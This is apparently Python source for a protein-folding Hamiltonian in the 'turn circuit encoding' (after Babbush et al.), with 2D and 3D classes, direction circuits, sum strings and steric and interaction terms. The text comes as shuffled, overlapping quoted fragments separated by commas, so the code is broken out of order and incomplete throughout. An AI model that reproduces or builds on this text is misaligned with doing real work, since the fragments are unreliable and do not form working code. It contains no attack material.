'y']])", "sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\", "'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k", "+ sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1,", "'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum", "elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for", "sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r", "j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string", "symengine as se from abc import * from tqdm import tqdm, trange from", "= a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j,", "self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)])", "j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i in range(self.naas)]) def", "import sympy as sp import symengine as se from abc import * from", "the \"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat", "= dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1)", "qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def", "direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns", "return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a", "sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r", "range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i, 1+i+2*j) return", "(1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in", "build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2", "a circuit that returns 1 if the chain moves in the direction x-.\"\"\"", "sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ *", "= qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0],", "return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'),", "True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points to the start", "1 if the chain moves in the direction y-.\"\"\" return q_i * q_j", "chain moves in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def", "return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3:", "se from abc import * from tqdm import tqdm, trange from copy import", "\"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass", "range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does not", "self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain", "\\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for", "% k][r]) for r in range(maximum)]) for k in ['y', 'z']]) return prefactor", "from functools import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class", "* qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2,", "range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r])", "k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self,", "y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements", "k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if", "else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1]", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j,", "t in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r],", "range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return sum([", "the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k):", "maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)),", "j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) #", "r in range(maximum)]) for k in ['x', 'y']]) return prefactor * \\ (", "in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i, j): sumstring =", "self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a,", "tqdm import tqdm, trange from copy import deepcopy from itertools import chain from", "direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k):", "for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i,", "returns 1 if the chain moves in the direction x+.\"\"\" return q_i *", "moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a", "j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j))", "numpy as np import sympy as sp import symengine as se from abc", "j, k): \"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i >", ") def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return sum([ sum([", "(1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "chain moves in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def", "j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) +", "* self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)),", "j) for j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i,", "sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ *", "the overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in", "j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum =", "+= self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self):", "0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return", "interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \\", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i,", "sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ *", "(1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical", "CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods", "r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1,", "circuit that returns 1 if the chain moves in the direction z+.\"\"\" return", "in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([", "self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i", "2 != 0 or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+':", "== 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr", "math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr", "for h in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue", "j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k", "(self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def", "expression and methods of a protein hamiltonian of the \"turn circuit encoding\" form,", "\"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i > j\") if", "j, k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000", "bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\"", "i, j, k): \"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i", "= j-i-1 counter = np.zeros(n_layers) # lazy way to keep track of half-adders", "t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for", "hamiltonian of the \"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\"", "returns 1 if the chain moves in the direction y+.\"\"\" return q_i *", "does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)),", "elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0, t+1, 2)", "y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements", "raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j,", "qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\", "t+1, 2) if t > 1 else [1] for h in iterator: if", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)),", "self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth", "circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j,", "counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] =", "qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property", "sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ *", "j): \"\"\"Computes the overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j))))", "if the chain moves in the direction y-.\"\"\" return q_i * q_j *", "* from tqdm import tqdm, trange from copy import deepcopy from itertools import", "== 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D =", "r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j):", "self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term", "\\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([", "} maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum ==", "\\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\"", "for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] ==", "the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "* \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k ==", "is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of", "* self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr +=", "sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\"", "t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i)", "t > 0 else [0] else: iterator = range(1, t+1, 2) if t", "'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum ==", "'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]", "k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 'z']])", "self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes", "j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand(", "[self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-': sum_string =", "way to keep track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers),", "(self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr =", "if the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i,", "* q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that", "* self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+':", "q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True", "for k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\", "@abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)),", "j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) %", "qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1])", "== 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b", "'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') }", "not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring =", "if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k ==", "def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in", "2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict()", "range(1, t+1, 2) if t > 1 else [1] for h in iterator:", "== 0: iterator = range(0, t+1, 2) if t > 0 else [0]", "return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a", "range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D", "q_j): \"\"\"Implements a circuit that returns 1 if the chain moves in the", "between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1,", "interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i,", "'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)])", "return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a", "moves in the direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self,", "sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\", "\"\"\"Ensures that the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)),", "\\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in", "trange from copy import deepcopy from itertools import chain from functools import reduce", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0", "j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit", "self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not", "return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for", "self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self):", "% k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x',", "that returns 1 if the chain moves in the direction y+.\"\"\" return q_i*q_j", "and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i)", "t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)])", "return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a", "+ \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that", "the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that", "half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian):", "'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'),", "j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def", "counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1])", "return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i in", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1", "i-j !=0 else 0 if maximum == 0: return 0 prefactor = qand([", "for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([", "(self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr", "def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian", "encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits", "qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\", "< 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "p in range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i,", "2 == 0: iterator = range(0, t+1, 2) if t > 0 else", "as sp import symengine as se from abc import * from tqdm import", "q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self):", "(1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical", "from tqdm import tqdm, trange from copy import deepcopy from itertools import chain", "elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "circuit encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat", "in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r])", "+ \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if", "= [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+':", "if the chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) *", "!=0 else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r],", "= qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)])", "i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for residues", "self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i,", "def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string", "sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does", "self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if", "r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1],", "self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum", "returns 1 if the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def", "tqdm, trange from copy import deepcopy from itertools import chain from functools import", "> 1 else [1] for h in iterator: if self.ss_fmat == 'babej': if", "(1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "* qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1],", "self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures", "the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that", "that returns 1 if the chain moves in the direction y+.\"\"\" return q_i", "r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def 